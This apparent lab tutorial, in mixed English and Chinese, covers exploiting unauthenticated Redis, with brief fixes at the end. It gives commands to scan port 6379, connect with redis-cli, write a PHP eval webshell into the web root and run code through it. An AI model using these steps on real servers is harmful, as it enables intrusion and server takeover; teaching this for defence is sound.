Web Security: Redis Unauthorized Access Vulnerability Test.
By default, Redis is bound to port 6379, and if no firewall rules are added to avoid other related security policies such as IP access from untrusted sources, it will be directly exposed to the public network. Then no password is set or a weak password is set, which leads to this vulnerability.
Table of contents:
Web Security: Redis Unauthorized Access Vulnerability Test.
Harm of Redis unauthorized access vulnerability:
Redis unauthorized access vulnerability test:
Step 1: Use the nmap tool for port scanning.
Step 2: Check if you can connect to Redis and get sensitive information.
Step 3: Utilize the Redis unauthorized vulnerability to upload the program (Trojan horse)
Step 4: Access the uploaded program (Trojan horse)
Step 5: Use the uploaded program (Trojan horse) to connect to the server to gain control.
Redis unauthorized access vulnerability repair method:
Harm of Redis unauthorized access vulnerability:
黑客可以通过数据备份功能往磁盘写入后门文件
黑客无需认证就可以访问到内部数据,可能导致敏感信息泄露.
然后在 Redis 以 root 身份运行的话,攻击者可以给root账户写入SSH公钥文件,再直接SSH登录目标服务器.Redis unauthorized access vulnerability test:
Step 1: Use the nmap tool for port scanning.
nmap 服务器IP -p 查看的端口
nmap 192.168.0.101 -p 6379 //扫描 6379 端口是否开放.
Step 2: Check if you can connect to Redis and get sensitive information.
sudo redis-cli -h 192.168.0.101 //连接 Redis 数据库.
info //查看 敏感 信息.
Step 3: Utilize the Redis unauthorized vulnerability to upload the program (Trojan horse)
config set dir /var/www/html //在网站的根目录/var/www/html下写进去一个脚本.config set dbfilename bgxg.php //脚本名称为 bgxg.phpset webshell "<?php @eval($_POST['bgxg']); ?>" // 脚本内容" 中 "的内容.save // 保存 刚刚写入的信息.
Step 4: Access the uploaded program (Trojan horse)
http://192.168.0.101/bgxg.php // bgxg.php 是刚刚写入的木马文件
bgxg=phpinfo(); // phpinfo(); 查看服务器的信息.
Step 5: Use the uploaded program (Trojan horse) to connect to the server to gain control.
Redis unauthorized access vulnerability repair method:
(1)Redis 添加密码验证.
(2)禁止外网访问 Redis 端口服务.
(3)修改 Redis 服务 默认端口.